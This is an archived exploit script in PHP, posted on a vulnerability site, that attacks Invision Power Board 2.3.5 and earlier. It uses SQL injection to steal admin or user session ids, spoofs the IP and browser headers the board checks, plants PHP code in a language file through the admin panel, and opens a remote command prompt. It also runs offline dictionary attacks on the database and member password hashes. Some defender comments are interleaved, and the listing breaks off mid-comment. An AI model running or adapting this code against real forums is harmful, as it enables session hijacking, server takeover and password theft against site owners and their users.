Source: securityvulns, SECURITYVULNS:DOC:20425
Sep 01, 2008 - 12:00 a.m.

[Exploit] Invision Power Board <= 2.3.5 Multiple Vulnerabilities


#!/usr/bin/php -q
<?php

# This file requires the PhpSploit class.
# If you want to use this class, the latest
# version can be downloaded from acid-root.new.fr.

##################################################
# Report every error class except notices, then load phpsploitclass.php.
# That file is not part of this listing; it presumably provides the HTTP
# client object the class below uses as web.
error_reporting(E_ALL ^ E_NOTICE);
require('phpsploitclass.php');

yeah … it rox (:

class ipb_spl
{
var $web;

    # Entry point. Calls mhead, reads the attack, proxhost and proxauth
    # parameters through get_p, calls init_global, applies the optional proxy
    # settings to the HTTP client held in web, then dispatches on the attack
    # value: 1 selects code_exec, 2 selects bf_sql_pwd, 3 selects bf_usr_pwd
    # and any other value selects usage.
    # mhead, get_p, init_global and usage are defined outside this excerpt;
    # the second argument to get_p presumably marks a parameter as required.
    function main&#40;&#41;
    {
            $this-&gt;mhead&#40;&#41;;
            
            # Gimme your args
            $this-&gt;p_attack = $this-&gt;get_p&#40;&#39;attack&#39;, true&#41;;
            $this-&gt;p_prox   = $this-&gt;get_p&#40;&#39;proxhost&#39;&#41;;
            $this-&gt;p_proxa  = $this-&gt;get_p&#40;&#39;proxauth&#39;&#41;;
            
            $this-&gt;init_global&#40;&#41;;
            
            # Proxy params
            if&#40; $this-&gt;p_prox &#41;
            {
                    $this-&gt;web-&gt;proxy&#40;$this-&gt;p_prox&#41;;
                    
                    if&#40; $this-&gt;p_proxa &#41;
                    $this-&gt;web-&gt;proxyauth&#40;$this-&gt;p_proxa&#41;;
            }

            # Where do we go ?
            switch&#40; $this-&gt;p_attack &#41;
            {
                    case 1:  $this-&gt;code_exec&#40;&#41;;  break;
                    case 2;  $this-&gt;bf_sql_pwd&#40;&#41;; break;
                    case 3:  $this-&gt;bf_usr_pwd&#40;&#41;; break;
                    default: $this-&gt;usage&#40;&#41;;
            }

            return;
    }
    
    # Attack mode 1: session takeover followed, for admin sessions, by
    # exec_code. Values are recovered through the get_* helpers, which all
    # delegate to bf_inj, defined outside this excerpt. An admin session id
    # is preferred; a user session id is the fallback. The board settings
    # match_ipaddress, match_browser and xforward_matching are then read via
    # get_sec_options and, where those checks are on, the recovered IP is
    # replayed in a Client-IP header and the recovered User-Agent is reused.
    #
    # Defender notes grounded in this listing:
    # - when neither check is on, the script reports nothing to bypass and
    #   proceeds with the session id alone
    # - with match_ipaddress on and xforward_matching off the script exits,
    #   so the IP check only fails where forwarded headers are trusted
    # - the author comment near the end states that an admin session stays
    #   valid after the admin logs out
    # - requests to the ACP index.php that carry a Client-IP header are a
    #   log signal for this flow
    function code_exec&#40;$loop=1&#41;
    {
            # First loop
            if&#40; $loop == 1 &#41;
            {
                    $this-&gt;set_sql_param&#40;&#41;;
                    $this-&gt;set_sql_focus&#40;&#41;;
            
                    $this-&gt;p_acp = $this-&gt;get_p&#40;&#39;acp&#39;&#41;;
                            
                    # ACP path
                    if&#40; !$this-&gt;p_acp &#41;
                    {
                            # If the user changed the ACP directory, we can
                            # find it &#40;if the &quot;Remove ACP Link&quot; option was not
                            # applied&#41; by log in as an Admin, and then click
                            # on &quot;Admin CP&quot;. This can be done with a user
                            # but I didn&#39;t implemented that ;&#41;
                            $this-&gt;msg&#40;&#39;Using default ACP path: admin&#39;, 1&#41;;
                            $this-&gt;p_acp = &#39;admin&#39;;
                    }
                    else 
                    $this-&gt;msg&#40;&#39;Using ACP path &quot;&#39;.$this-&gt;p_acp.&#39;&quot;&#39;, 1&#41;;
            
                    # Init client headers:
                    # Only if we have the same IP as the targeted user &#40;not admin&#41;,
                    # it resets session datas, so we try to spoof our 
                    # IP as a random one in order to keep user&#39;s session datas while
                    # we bruteforce SQL fields.
                    $this-&gt;bypass_matches&#40;&#41;;
            
                    # Remove expired sessions &#40; time&#40;&#41; - 60*60*2  =  &gt; 2 hours &#41;
                    $this-&gt;web-&gt;get&#40;$this-&gt;p_url.$this-&gt;p_acp.&#39;/index.php?&#39;&#41;;
                    $this-&gt;msg&#40;&#39;Removed all out of date admin sessions&#39;, 1&#41;;
            
                    # Cookie prefix
                    $this-&gt;get_cprefix&#40;&#41;;
            }
                            
            # Admin session ?
            $this-&gt;msg&#40;&#39;Trying to find an admin session id&#39;, 0&#41;;
            
            # Got one :]
            if&#40; $this-&gt;get_admin_sess&#40;&#41; &#41;
            {
                    $this-&gt;s_admin = true;
                    $this-&gt;s_sess  = $this-&gt;data[&#39;a_sess_id&#39;];
                    $this-&gt;a_url   = $this-&gt;p_url.$this-&gt;p_acp.&#39;/index.php?adsess=&#39;.$this-&gt;s_sess;
            }
            
            # Nothing special
            else 
            {
                    $this-&gt;s_admin = false;
                    $this-&gt;msg&#40;&#39;No admin session id found&#39;, -1&#41;;
            }
            
            # User session ?
            if&#40; !$this-&gt;s_sess &#41;
            {
                    $this-&gt;msg&#40;&#39;Trying to find a user session id&#39;, 0&#41;;
                    
                    # Yep
                    if&#40; $this-&gt;get_user_sess&#40;&#41; &#41;
                    $this-&gt;s_sess = $this-&gt;data[&#39;u_sess_id&#39;];

                    # F0ck
                    else 
                    {
                            $this-&gt;msg&#40;&#39;No user session id found&#39;, -1&#41;;
                            $this-&gt;msg&#40;&#39;Admin session &gt; 2 hours or user logged out&#39;, 0&#41;;
                            $this-&gt;msg&#40;&#39;Keeping trying until the user connects&#39;, 0&#41;;
                            $this-&gt;msg&#40;&#39;Entering loop #&#39;.$loop.&#39; ...&#39;, 0&#41;;
                            $this-&gt;code_exec&#40;++$loop&#41;;
                    }
            }
                    
            $this-&gt;msg&#40;&#39;Getting security options&#39;, 0&#41;;
            
            # Security options
            $this-&gt;get_sec_options&#40;&#41;;
            
            # IP filter ?
            # conf ip holds the value read for the match_ipaddress setting
            if&#40; $this-&gt;conf[&#39;ip&#39;] === &#39;1&#39; &#41;
            {
                    $this-&gt;s_bypass = true;
                    
                    $this-&gt;msg&#40;&#39;IP filter option is turned on&#39;, 0&#41;;
                    
                    # Spoofing protection ?
                    # conf xforward holds the value read for xforward_matching;
                    # when it is off the script gives up at this point
                    if&#40; !$this-&gt;conf[&#39;xforward&#39;] &#41;
                    {
                            # Assuming our IP isn&#39;t the same etc..
                            $this-&gt;msg&#40;&#39;Can&#92;&#39;t bypass the IP filter&#39;, -1&#41;;
                            exit&#40;1&#41;;
                    }
                    
                    # X-Forwarded-For / Client-IP /
                    # Proxy-User / X-Cluster-Client-IP
                    else 
                    {
                            $this-&gt;msg&#40;&#39;Cool, we can spoof our IP &#40;Client-IP&#41;&#39;, 1&#41;;
                            
                            if&#40; $this-&gt;s_admin &#41;
                            {
                                    $this-&gt;msg&#40;&#39;Trying to find admin&#92;&#39;s last IP&#39;, 0&#41;;
                                    
                                    # Admin IP found
                                    $this-&gt;get_admin_ip&#40;&#41;;
                                    $this-&gt;s_ip = $this-&gt;data[&#39;a_ip_addr&#39;];
                            }
                            else 
                            {
                                    $this-&gt;s_admin = false;
                                    $this-&gt;msg&#40;&#39;Trying to find user&#92;&#39;s last used IP&#39;, 0&#41;;
                                    
                                    # User IP found
                                    $this-&gt;get_user_ip&#40;&#41;;
                                    $this-&gt;s_ip = $this-&gt;data[&#39;u_ip_addr&#39;];
                            }
                            
                            # Nothing found
                            if&#40; !$this-&gt;s_ip &#41;
                            {
                                    # Ahah &#40;:
                                    $this-&gt;msg&#40;&#39;No IP found for this user&#39;, -1&#41;;
                                    $this-&gt;give_hope&#40;&#41;;
                            }
                            
                            # Got one !
                            else
                            $this-&gt;msg&#40;&#39;Ok, using IP &#39;.$this-&gt;s_ip, 1&#41;;
                    }
            }
            
            # User-Agent filter ?
            # conf browser holds the value read for the match_browser setting;
            # this branch is skipped when an admin session is in use
            if&#40; $this-&gt;conf[&#39;browser&#39;] === &#39;1&#39; &amp;&amp; !$this-&gt;s_admin &#41;
            {
                    $this-&gt;s_bypass = true;
                    
                    $this-&gt;msg&#40;&#39;Trying to find a valid user-agent&#39;, 0&#41;;
                    
                    # Good
                    if&#40; $this-&gt;get_user_agent&#40;&#41; &#41;
                    {
                            $this-&gt;msg&#40;&#39;Ok, using user-agent &#39;.substr&#40;$this-&gt;data[&#39;u_agent&#39;], 0, 10&#41;.&#39;...&#39;, 1&#41;;
                            $this-&gt;s_agent = $this-&gt;data[&#39;u_agent&#39;];
                    }
                    
                    # WTF :!
                    else
                    {
                            $this-&gt;msg&#40;&#39;No user-agent found for this user&#39;, -1&#41;;
                            $this-&gt;msg&#40;&#39;Maybe the browser didn&#92;&#39;t send this header&#39;, 0&#41;;
                            $this-&gt;s_agent = &#39;&#39;;
                    }
                    
            }

            # Cool !?
            if&#40; !$this-&gt;s_bypass &#41;
            $this-&gt;msg&#40;&#39;Cool, nothing to bypass&#39;, 1&#41;;
            
            $this-&gt;msg&#40;&#39;Trying to log in&#39;, 0&#41;;
            
            # Owned =]
            if&#40; $this-&gt;is_logged&#40;&#41; &#41;
            {
                    # PHP code
                    if&#40; $this-&gt;s_admin &#41;
                    {
                            $this-&gt;msg&#40;&#39;Logged in with an admin session&#39;, 1&#41;;
                            $this-&gt;exec_code&#40;&#41;;
                    }
                    
                    # Normal user ?
                    else
                    {
                            $this-&gt;msg&#40;&#39;Logged in with a user session&#39;, 1&#41;;
                            $this-&gt;msg&#40;&#39;You can log in using the cookie session_id&#39;, 1&#41;;

                            if&#40; $this-&gt;s_ip !== $this-&gt;def_ip &#41;
                            $this-&gt;msg&#40;&#39;Set the Client-IP header to: &#39;.$this-&gt;s_ip, 1&#41;;
                            
                            if&#40; $this-&gt;s_agent &#41;
                            $this-&gt;msg&#40;&#39;Set the User-Agent header to: &#39;.$this-&gt;s_agent, 1&#41;;
                            
                            exit&#40;0&#41;;
                    }
            }
            else 
            {
                    # Even if the admin logged out .. the admin session
                    # is still valid ;&#41;
                    $this-&gt;msg&#40;&#39;Can&#92;&#39;t log in, the session has expired ?!&#39;, -1&#41;;
                    $this-&gt;give_hope&#40;&#41;;
            }
            
            return;
    }
    
    # Attack mode 2: offline dictionary search for the database password.
    # The member_id, pass_hash and ipb_stronghold cookie values come either
    # from a login with uname and pwd or from the uid, passhash and stronghold
    # parameters. The SQL user name comes from the sqlusr parameter or from
    # get_sql_user. Every word in the dict file is then tested locally.
    #
    # Defender notes grounded in this listing:
    # - the comparison in the loop shows the stronghold cookie being treated
    #   as md5 over two concatenated md5 digests, one of which covers the
    #   database password and SQL user name, with no secret beyond those
    # - anyone holding such a cookie can therefore test database password
    #   guesses without sending further requests to the board
    # - a long random database password removes the practical value of the
    #   search; the page title names the affected releases
    function bf_sql_pwd&#40;&#41;
    {
            $this-&gt;p_ip    = $this-&gt;get_p&#40;&#39;ip&#39;, true&#41;;
            $this-&gt;p_dict  = $this-&gt;get_p&#40;&#39;dict&#39;, true&#41;;
            
            $this-&gt;p_sql_u = $this-&gt;get_p&#40;&#39;sqlusr&#39;&#41;;
            
            $this-&gt;p_url   = $this-&gt;get_p&#40;&#39;url&#39;&#41;;
            $this-&gt;p_uname = $this-&gt;get_p&#40;&#39;uname&#39;&#41;;
            $this-&gt;p_pwd   = $this-&gt;get_p&#40;&#39;pwd&#39;&#41;;
            // or 
            $this-&gt;p_uid   = $this-&gt;get_p&#40;&#39;uid&#39;&#41;;
            $this-&gt;p_hash  = $this-&gt;get_p&#40;&#39;passhash&#39;&#41;;
            $this-&gt;p_shold = $this-&gt;get_p&#40;&#39;stronghold&#39;&#41;;
            
            if&#40; $this-&gt;p_uname &amp;&amp; $this-&gt;p_pwd &amp;&amp; $this-&gt;p_url &#41;
            {
                    $this-&gt;get_cprefix&#40;&#41;;
                    
                    $this-&gt;msg&#40;&#39;Trying to get some cookies&#39;, 0&#41;;
                    
                    $g_dat = &#39;index.php?act=Login&amp;CODE=01&amp;CookieDate=1&#39;;
                    $p_dat = &#39;UserName=&#39;.$this-&gt;p_uname.&#39;&amp;PassWord=&#39;.$this-&gt;p_pwd.&#39;&amp;x=0&amp;y=0&#39;;
            
                    $this-&gt;web-&gt;post&#40;$this-&gt;p_url.$g_dat, $p_dat&#41;;
            
                    # The three cookies are read back under the detected prefix
                    $this-&gt;p_uid   = $this-&gt;web-&gt;cookie[$this-&gt;s_cprefix.&#39;member_id&#39;];
                    $this-&gt;p_hash  = $this-&gt;web-&gt;cookie[$this-&gt;s_cprefix.&#39;pass_hash&#39;];
                    $this-&gt;p_shold = $this-&gt;web-&gt;cookie[$this-&gt;s_cprefix.&#39;ipb_stronghold&#39;];
            }
            elseif&#40; !$this-&gt;p_uid || !$this-&gt;p_hash || !$this-&gt;p_shold &#41;
            $this-&gt;usage&#40;&#41;;
            
            if&#40; !$this-&gt;p_uid || !$this-&gt;p_hash || !$this-&gt;p_shold &#41;
            {
                    $this-&gt;msg&#40;&#39;Can&#92;&#39;t get cookies&#39;, -1&#41;;
                    $this-&gt;msg&#40;&#39;You should try with other parameters&#39;, -1&#41;;
                    exit&#40;1&#41;;
            }
            
            $this-&gt;msg&#40;&#39;Ok, using cookies:&#39;, 1&#41;;
            
            $this-&gt;msg&#40;&#39;member_id=&#39;.$this-&gt;p_uid, 1&#41;;
            $this-&gt;msg&#40;&#39;pass_hash=&#39;.$this-&gt;p_hash, 1&#41;;
            $this-&gt;msg&#40;&#39;ipb_stronghold=&#39;.$this-&gt;p_shold, 1&#41;;
            
            if&#40; !$this-&gt;p_sql_u &#41;
            {
                    $this-&gt;set_sql_param&#40;&#41;;
                    
                    $this-&gt;msg&#40;&#39;Trying to get the current sql user&#39;, 0&#41;;
                    
                    if&#40; !$this-&gt;get_sql_user&#40;&#41; &#41;
                    {
                            $this-&gt;msg&#40;&#39;Can&#92;&#39;t get the sql user&#39;, -1&#41;;
                            $this-&gt;msg&#40;&#39;If you know the sql user, use -sqlusr&#39;, -1&#41;;
                            exit&#40;1&#41;;
                    }
                    else
                    $this-&gt;p_sql_u = $this-&gt;data[&#39;sql_user&#39;];
            }
            
            $this-&gt;msg&#40;&#39;Ok, using sql user &#39;.$this-&gt;p_sql_u, 1&#41;;
            
            $dico_c = file&#40;$this-&gt;p_dict&#41;;
            $ip_a   = explode&#40;&#39;.&#39;, $this-&gt;p_ip&#41;;
            
            $this-&gt;msg&#40;&#39;Entering local dictionnary attack &#40;&#39;.count&#40;$dico_c&#41;.&#39; words&#41;&#39;, 0&#41;;
            $this-&gt;msg&#40;&#39;You should take a drink ...&#39;, 0&#41;;
            
            foreach&#40; $dico_c as $line &#41;
            {
                    # First digest: candidate word followed by the SQL user.
                    # Second digest: member id, first two IP octets and
                    # pass_hash joined by dashes. The md5 of second digest
                    # followed by first digest is compared with the cookie.
                    $md5 = md5&#40;trim&#40;$line&#41;.$this-&gt;p_sql_u&#41;;
                    $md5 = md5&#40;$this-&gt;p_uid.&#39;-&#39;.$ip_a[0].&#39;-&#39;.$ip_a[1].&#39;-&#39;.$this-&gt;p_hash&#41;.$md5;
                    $md5 = md5&#40;$md5&#41;;

                    if&#40; $this-&gt;p_shold === $md5 &#41;
                    {
                            $this-&gt;msg&#40;&#39;Found something cool =]&#39;, 1&#41;;
                            $this-&gt;msg&#40;&#39;SQL password: &#39;.$line, 1&#41;;
                            exit&#40;1&#41;;
                    }

            }
            
            $this-&gt;msg&#40;&#39;End of the wordlist, password not found&#39;, -1&#41;;
            
            return;
    }

    # Attack mode 3: offline dictionary search for a member password.
    # The hash and salt come from the passhash and salt parameters or, when
    # missing, from get_pass_hash and get_pass_salt. Every word in the dict
    # file is then tested locally against the hash.
    #
    # Defender notes grounded in this listing:
    # - the comparison in the loop treats the stored hash as md5 of the md5
    #   of the salt followed by the md5 of the password
    # - md5 is fast to compute, so once converge_pass_hash and
    #   converge_pass_salt have leaked, weak passwords fall to a wordlist
    #   with no further contact with the board
    # - after a suspected compromise, member passwords should be reset
    function bf_usr_pwd&#40;&#41;
    {
            $this-&gt;p_dict  = $this-&gt;get_p&#40;&#39;dict&#39;, true&#41;;

            $this-&gt;p_hash  = $this-&gt;get_p&#40;&#39;passhash&#39;&#41;;
            $this-&gt;p_salt  = $this-&gt;get_p&#40;&#39;salt&#39;&#41;;
            
            if&#40; !$this-&gt;p_hash || !$this-&gt;p_salt &#41;
            {
                    $this-&gt;set_sql_param&#40;&#41;;
                    $this-&gt;set_sql_focus&#40;&#41;;
            }
            
            if&#40; !$this-&gt;p_hash &#41;
            {
                    $this-&gt;msg&#40;&#39;Trying to get the password hash&#39;, 0&#41;;
                    
                    if&#40; !$this-&gt;get_pass_hash&#40;&#41; &#41;
                    {
                            $this-&gt;msg&#40;&#39;Can&#92;&#39;t get the password hash&#39;, -1&#41;;
                            exit&#40;1&#41;;
                    }
                    else 
                    $this-&gt;p_hash = $this-&gt;data[&#39;pass_hash&#39;];
            }
            
            $this-&gt;msg&#40;&#39;Ok, using hash &#39;.$this-&gt;p_hash, 1&#41;;
            
            if&#40; !$this-&gt;p_salt &#41;
            {
                    $this-&gt;msg&#40;&#39;Trying to get the password salt&#39;, 0&#41;;
                    
                    if&#40; !$this-&gt;get_pass_salt&#40;&#41; &#41;
                    {
                            $this-&gt;msg&#40;&#39;Can&#92;&#39;t get the password salt&#39;, -1&#41;;
                            exit&#40;1&#41;;
                    }
                    else 
                    $this-&gt;p_salt = $this-&gt;data[&#39;pass_salt&#39;];
            }
            
            $this-&gt;msg&#40;&#39;Ok, using salt &#39;.$this-&gt;p_salt, 1&#41;;
            
            $dico_c = file&#40;$this-&gt;p_dict&#41;;
            
            $this-&gt;msg&#40;&#39;Entering local dictionnary attack &#40;&#39;.count&#40;$dico_c&#41;.&#39; words&#41;&#39;, 0&#41;;
            $this-&gt;msg&#40;&#39;You should take a drink ...&#39;, 0&#41;;
            
            foreach&#40; $dico_c as $line &#41;
            {
                    # Salted double md5 comparison, computed entirely locally
                    if&#40; $this-&gt;p_hash === md5&#40;md5&#40;$this-&gt;p_salt&#41;.md5&#40;trim&#40;$line&#41;&#41;&#41; &#41;
                    {
                            $this-&gt;msg&#40;&#39;Found something cool =]&#39;, 1&#41;;
                            $this-&gt;msg&#40;&#39;User password: &#39;.$line, 1&#41;;
                            exit&#40;1&#41;;
                    }
            }
            
            $this-&gt;msg&#40;&#39;End of the wordlist, password not found&#39;, -1&#41;;
            
            return;
    }
    
    # Reads the url and prefix parameters through get_p and stores them in
    # p_url and p_pre. When no prefix is given, the table prefix ibf_ is used.
    # The chosen prefix is reported through msg in both cases.
    function set_sql_param&#40;&#41;
    {
            $this-&gt;p_url   = $this-&gt;get_p&#40;&#39;url&#39;, true&#41;;
            $this-&gt;p_pre   = $this-&gt;get_p&#40;&#39;prefix&#39;&#41;;
            
            # Table prefix
            if&#40; !$this-&gt;p_pre &#41;
            {
                    # Default table prefix if not precised
                    $this-&gt;msg&#40;&#39;Using default table prefix: ibf_&#39;, 1&#41;;
                    $this-&gt;p_pre = &#39;ibf_&#39;;
            }
            else 
            $this-&gt;msg&#40;&#39;Using table prefix &#39;.$this-&gt;p_pre, 1&#41;;

    }
    
    # Selects which member the later lookups refer to. Reads the uname and
    # uid parameters; a username takes precedence, and user id 1 is used when
    # neither is given. The result is stored in t_on as a condition string:
    # a members_l_username comparison with the name passed through
    # addslashes, or an id comparison with the value cast to int.
    # How t_on is consumed is not visible in this excerpt.
    function set_sql_focus&#40;&#41;
    {
            $this-&gt;p_uname = $this-&gt;get_p&#40;&#39;uname&#39;&#41;;
            $this-&gt;p_uid   = $this-&gt;get_p&#40;&#39;uid&#39;&#41;;
            
            if&#40; $this-&gt;p_uname &#41;
            $this-&gt;msg&#40;&#39;Using targeted username &#39;.$this-&gt;p_uname, 1&#41;;
            
            elseif&#40; $this-&gt;p_uid &#41;
            $this-&gt;msg&#40;&#39;Using targeted user id &#39;.$this-&gt;p_uid, 1&#41;;
            
            # Target
            if&#40; !&#40;$this-&gt;p_uname || $this-&gt;p_uid&#41; &#41;
            {
                    # Default uid if not precised
                    $this-&gt;msg&#40;&#39;Using default user id: 1&#39;, 1&#41;;
                    $this-&gt;p_uid = 1;
            }

            # Focus on ?
            if&#40; $this-&gt;p_uname &#41;
            $this-&gt;t_on = &#39;members_l_username=&#92;&#39;&#39;.addslashes&#40;$this-&gt;p_uname&#41;.&#39;&#92;&#39;&#39;;
            
            else 
            $this-&gt;t_on = &#39;id=&#39;.&#40;int&#41;$this-&gt;p_uid;
            
            return;
    }
    
    # Calls write_code, then loops on cmd_prompt: each accepted input is put
    # in a request header named My-Code, the board URL is fetched, and the
    # text returned by get_answer is printed. Exits with status 0 when the
    # prompt loop ends.
    #
    # Defender note: inbound requests carrying a My-Code header are an
    # indicator of this listing being used against a board and are worth a
    # web server or WAF log search.
    function exec_code&#40;&#41;
    {
            $this-&gt;write_code&#40;&#41;;
            
            while&#40; $this-&gt;cmd_prompt&#40;&#41; &#41;
            {
                    $this-&gt;web-&gt;addheader&#40;&#39;My-Code&#39;, $this-&gt;cmd&#41;;
                    $this-&gt;web-&gt;get&#40;$this-&gt;p_url&#41;;

                    print &quot;&#92;n&quot;.$this-&gt;get_answer&#40;&#41;;
            }
            
            exit&#40;0&#41;;
    }
    
    # Splits the last response body on the separator held in res_sep and
    # returns the second piece, or a fixed message when that piece is empty.
    # res_sep is set outside this excerpt.
    function get_answer&#40;&#41;
    {
            $res_a = explode&#40;$this-&gt;res_sep, $this-&gt;web-&gt;getcontent&#40;&#41;&#41;;
            
            if&#40; !$res_a[1] &#41;
            return &#39;No result to retrieve&#39;;
            
            else 
            return $res_a[1];
    }
    
    # Obtains one input line through msg and stores it in cmd; the extra
    # arguments to msg presumably switch it to prompt mode. Returns FALSE
    # when the input is exactly quit or exit. Otherwise the input is base64
    # encoded, substituted for the CMD placeholder in the php_send template,
    # and TRUE is returned. php_send is set outside this excerpt.
    function cmd_prompt&#40;&#41;
    {
            $this-&gt;cmd = $this-&gt;msg&#40;&#39;root@ipb: &#39;, 1, 1, 0, true&#41;;
            
            if&#40; !ereg&#40;&#39;^&#40;quit|exit&#41;$&#39;, $this-&gt;cmd&#41; &#41;
            {               
                    $this-&gt;cmd = base64_encode&#40;$this-&gt;cmd&#41;;
                    $this-&gt;cmd = str_replace&#40;&#39;&#37;CMD&#37;&#39;, $this-&gt;cmd, $this-&gt;php_send&#41;;
                    
                    return TRUE;
            }

            else
               return FALSE;
    }
    
    # Uses the admin session URL in a_url to go through the ACP language
    # editor for lang_boards.php: one POST with code edit2 loads the current
    # entries, the reg_lvar pattern collects their names and values, and a
    # second POST with code doedit resubmits them with the php_write string
    # appended after the first entry. Exits with status 1 when no entries
    # are matched. reg_lvar and php_write are set outside this excerpt.
    #
    # Defender notes grounded in this listing:
    # - ACP requests with act lang and code doedit naming lang_boards.php
    #   are the write step and are worth searching for in logs
    # - an unexpected change to the lang_boards.php language file is the
    #   on-disk trace, so file integrity monitoring of the language
    #   directory covers it
    function write_code&#40;&#41;
    {
            # Gimme the language ID
            $this-&gt;get_def_lang&#40;&#41;;
            
            # Current lang settings
            $p_dat =
            &#39;code=edit2&amp;act=lang&amp;id=&#39;.$this-&gt;g_lid.&#39;&amp;section&#39;.
            &#39;=lookandfeel&amp;lang_file=lang_boards.php&#39;;
            
            $this-&gt;web-&gt;post&#40;$this-&gt;a_url, $p_dat&#41;;

            # We collect each variable name / value
            if&#40; preg_match_all&#40;$this-&gt;reg_lvar, $this-&gt;web-&gt;getcontent&#40;&#41;, $l_vars&#41; &#41;
            {
                    # POST data 
                    $p_dat =
                    &#39;code=doedit&amp;act=lang&amp;id=&#39;.$this-&gt;g_lid.
                    &#39;&amp;lang_file=lang_boards.php&amp;section=lo&#39;.
                    &#39;okandfeel&amp;&#39;;

                    # &amp;Name=Value
                    for&#40; $i=0; $i&lt;count&#40;$l_vars[0]&#41;; $i++ &#41;
                    {
                            $p_dat .=
                            &#39;&amp;XX_&#39;.$l_vars[1][$i].&#39;=&#39;.urlencode&#40;$l_vars[2][$i]&#41;;
                            
                            # We write our PHP code in the first variable
                            if&#40; $i == 0 &#41;
                            $p_dat .= $this-&gt;php_write;
                    }
                    
                    # Go on
                    $this-&gt;web-&gt;post&#40;$this-&gt;a_url, $p_dat&#41;;
                    
                    $this-&gt;msg&#40;&#39;PHP code written&#39;, 1&#41;;
            }
            else
            {
                    # WTF :!
                    $this-&gt;msg&#40;&#39;Can&#92;&#39;t find block variables&#39;, 0&#41;;
                    exit&#40;1&#41;;
            }
            
            return;
    }
    
    # Fetches the ACP lookandfeel language page through a_url and extracts a
    # language id with the reg_lang pattern, storing it in g_lid. Exits with
    # status 1 when the pattern does not match. reg_lang is set outside this
    # excerpt.
    function get_def_lang&#40;&#41;
    {
            $this-&gt;msg&#40;&#39;Trying to get the set language id&#39;, 0&#41;;
            
            $this-&gt;web-&gt;get&#40;$this-&gt;a_url.&#39;&amp;section=lookandfeel&amp;act=lang&#39;&#41;;
            
            if&#40; preg_match&#40;$this-&gt;reg_lang, $this-&gt;web-&gt;getcontent&#40;&#41;, $lids&#41; &#41;
            {
                    $this-&gt;g_lid = $lids[1];
                    $this-&gt;msg&#40;&#39;Using language id &#39;.$this-&gt;g_lid, 1&#41;;
            }
            else 
            {
                    $this-&gt;msg&#40;&#39;Can&#92;&#39;t get the default language id&#39;, -1&#41;;
                    exit&#40;1&#41;;
            }
            
            return;
    }
    
    # Checks whether the recovered session is accepted. After applying
    # bypass_matches, a user session is tested by sending the session_id
    # cookie under the detected prefix to the board URL; an admin session is
    # tested by fetching a_url. The response body is then searched, case
    # insensitively, for a marker string chosen per branch, and true or
    # false is returned accordingly.
    function is_logged&#40;&#41;
    {
            $this-&gt;bypass_matches&#40;&#41;;

            # User session ok ?
            if&#40; !$this-&gt;s_admin &#41;
            {
                    $match = &#39;act=Login&amp;amp;CODE=03&#39;;
                    $this-&gt;web-&gt;addcookie&#40;$this-&gt;s_cprefix.&#39;session_id&#39;, $this-&gt;s_sess&#41;;
                    $this-&gt;web-&gt;get&#40;$this-&gt;p_url&#41;;
            }
            
            # Admin session ok ?
            else
            {
                    $match = &#39;&amp;section=&#39;;
                    $this-&gt;web-&gt;get&#40;$this-&gt;a_url&#41;;
            }
            
            if&#40; preg_match&#40;&quot;/$match/i&quot;, $this-&gt;web-&gt;getcontent&#40;&#41;&#41; &#41;
            return true;
            
            else 
            return false;           
    }
    
    # Sets the User-Agent of the HTTP client to s_agent and adds a Client-IP
    # request header holding s_ip. The inline comments tie these to the
    # match_browser and match_ipaddress board settings.
    #
    # Defender note: the header is client supplied, so a board that derives
    # the visitor address from Client-IP or similar forwarded headers should
    # only honour them from its own trusted proxies.
    function bypass_matches&#40;&#41;
    {
            # match_browser
            $this-&gt;web-&gt;agent&#40;$this-&gt;s_agent&#41;;
            
            # match_ipaddress
            $this-&gt;web-&gt;addheader&#40;&#39;Client-IP&#39;, $this-&gt;s_ip&#41;;
            
            return;
    }
    
    # Fetches the board URL and scans the names of the cookies it sets with
    # the reg_cpre pattern; the first capture becomes the cookie prefix in
    # s_cprefix, which stays an empty string when nothing matches. The
    # outcome is reported through msg. reg_cpre is set outside this excerpt.
    function get_cprefix&#40;&#41;
    {
            $this-&gt;msg&#40;&#39;Trying to get the cookie prefix&#39;, 0&#41;;
                            
            # Set-Cookie: session_id=...; path=/
            $this-&gt;web-&gt;get&#40;$this-&gt;p_url&#41;;
            
            $this-&gt;s_cprefix = &#39;&#39;;
            
            if&#40; $this-&gt;web-&gt;cookie &#41;
            {
                    foreach&#40; $this-&gt;web-&gt;cookie as $name =&gt; $value&#41;
                    {
                            if&#40; preg_match&#40;$this-&gt;reg_cpre, $name, $cmatches&#41; &#41;
                            {
                                    $this-&gt;s_cprefix = $cmatches[1];
                                    break;
                            }
                    }
            }
            
            if&#40; !$this-&gt;s_cprefix &#41;
            $this-&gt;msg&#40;&#39;No cookie prefix set&#39;, 1&#41;;
            
            else 
            $this-&gt;msg&#40;&#39;Using cookie prefix &#39;.$this-&gt;s_cprefix, 1&#41;;
            
            return;
    }
    
    # Reads the three session matching settings by calling get_conf twice:
    # first against the conf_value column, then against conf_default, so a
    # setting with no stored value falls back to its default.
    function get_sec_options&#40;&#41;
    {
            # If no value, take the default one
            $this-&gt;get_conf&#40;&#39;t.conf_value&#39;&#41;;
            $this-&gt;get_conf&#40;&#39;t.conf_default&#39;&#41;;
            
            return;
    }
    
    # Reads the given column of the conf_settings table for the keys
    # match_browser, match_ipaddress and xforward_matching through bf_inj,
    # which is defined outside this excerpt. Each result is stored in the
    # conf array under browser, ip and xforward, and only entries that are
    # still an empty string are looked up.
    #
    # Defender note: these three settings decide whether a stolen session id
    # is bound to the original IP and browser, so they are worth checking on
    # any board in the affected version range.
    function get_conf&#40;$field&#41;
    {
            $this-&gt;init_sql&#40;&#41;;
            
            $this-&gt;t_table = &#39;conf_settings&#39;;       
            $this-&gt;t_field = $field;
            $this-&gt;t_char  = $this-&gt;chr_num;
            
            $this-&gt;t_add_0 = &quot;AND t.conf_key=&#39;match_browser&#39;&quot;;

            if&#40; $this-&gt;conf[&#39;browser&#39;] === &#39;&#39; &#41;
            $this-&gt;conf[&#39;browser&#39;] = $this-&gt;bf_inj&#40;&#41;;

            $this-&gt;t_add_0 = &quot;AND t.conf_key=&#39;match_ipaddress&#39;&quot;;
            
            if&#40; $this-&gt;conf[&#39;ip&#39;] === &#39;&#39; &#41;
            $this-&gt;conf[&#39;ip&#39;] = $this-&gt;bf_inj&#40;&#41;;
            
            $this-&gt;t_add_0 = &quot;AND t.conf_key=&#39;xforward_matching&#39;&quot;;
            
            if&#40; $this-&gt;conf[&#39;xforward&#39;] === &#39;&#39; &#41;
            $this-&gt;conf[&#39;xforward&#39;] = $this-&gt;bf_inj&#40;&#41;;

            return;
    }
    
    # Points bf_inj, defined outside this excerpt, at the member_login_key
    # column of the members table and stores its result in data under
